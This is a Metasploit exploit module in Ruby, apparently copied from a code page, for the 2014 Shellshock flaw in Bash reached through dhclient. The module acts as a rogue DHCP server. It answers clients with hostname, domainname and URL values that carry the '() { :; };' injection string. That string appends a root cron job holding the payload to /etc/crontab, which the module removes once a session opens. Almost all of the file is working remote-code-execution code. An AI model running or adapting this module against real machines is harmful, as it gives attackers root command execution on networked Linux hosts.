Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6

7
class MetasploitModule < Msf::Exploit::Remote
8
  Rank = ExcellentRanking
9

10
  include Msf::Exploit::Remote::DHCPServer
11

12
  def initialize(info = {})
13
    super(update_info(info,
14
      'Name'           => 'Dhclient Bash Environment Variable Injection (Shellshock)',
15
      'Description'    => %q|
16
        This module exploits the Shellshock vulnerability, a flaw in how the Bash shell
17
        handles external environment variables. This module targets dhclient by responding
18
        to DHCP requests with a malicious hostname, domainname, and URL which are then
19
        passed to the configuration scripts as environment variables, resulting in code
20
        execution. Due to length restrictions and the unusual networking scenario at the
21
        time of exploitation, this module achieves code execution by writing the payload
22
        into /etc/crontab and then cleaning it up after a session is created.
23
      |,
24
      'Author'         =>
25
        [
26
          'Stephane Chazelas', # Vulnerability discovery
27
          'egypt' # Metasploit module
28
        ],
29
      'License'        => MSF_LICENSE,
30
      'Platform'       => ['unix'],
31
      'Arch'           => ARCH_CMD,
32
      'References'     =>
33
        [
34
          [ 'CVE', '2014-6271' ],
35
          [ 'CWE', '94' ],
36
          [ 'OSVDB', '112004' ],
37
          [ 'EDB', '34765' ],
38
          [ 'URL', 'https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/' ],
39
          [ 'URL', 'https://seclists.org/oss-sec/2014/q3/649' ],
40
          [ 'URL', 'https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/' ]
41
        ],
42
      'Payload'        =>
43
        {
44
          # 255 for a domain name, minus some room for encoding
45
          'Space'       => 200,
46
          'DisableNops' => true,
47
          'Compat'      =>
48
            {
49
              'PayloadType' => 'cmd',
50
              'RequiredCmd' => 'generic telnet ruby',
51
            }
52
        },
53
      'Targets'        => [ [ 'Automatic Target', { }] ],
54
      'DefaultTarget'  => 0,
55
      'DisclosureDate' => '2014-09-24',
56
      'Notes' =>
57
          {
58
            'Stability' => [CRASH_SAFE],
59
            'SideEffects' => [],
60
            'Reliability' => [],
61
            'AKA' => ['Shellshock']
62
          }
63
    ))
64

65
    deregister_options('DOMAINNAME', 'HOSTNAME', 'URL')
66

67
    self.needs_cleanup = true
68
  end
69

70
  def on_new_session(session)
71
    print_status "Cleaning up crontab"
72
    # XXX this will brick a server some day
73
    session.shell_command_token("sed -i '/^\\* \\* \\* \\* \\* root/d' /etc/crontab")
74
  end
75

76
  def exploit
77
    hash = datastore.copy
78
    # Quotes seem to be completely stripped, so other characters have to be
79
    # escaped
80
    p = payload.encoded.gsub(/([<>()|'&;$])/) { |s| Rex::Text.to_hex(s) }
81
    echo = "echo -e #{(Rex::Text.to_hex("*") + " ") * 5}root #{p}>>/etc/crontab"
82
    hash['DOMAINNAME'] = "() { :; };#{echo}"
83
    if hash['DOMAINNAME'].length > 255
84
      raise ArgumentError, 'payload too long'
85
    end
86

87
    hash['HOSTNAME'] = "() { :; };#{echo}"
88
    hash['URL'] = "() { :; };#{echo}"
89
    start_service(hash)
90

91
    while @dhcp.thread.alive?
92
      sleep 2
93
    end
94
  end
95
end
96

97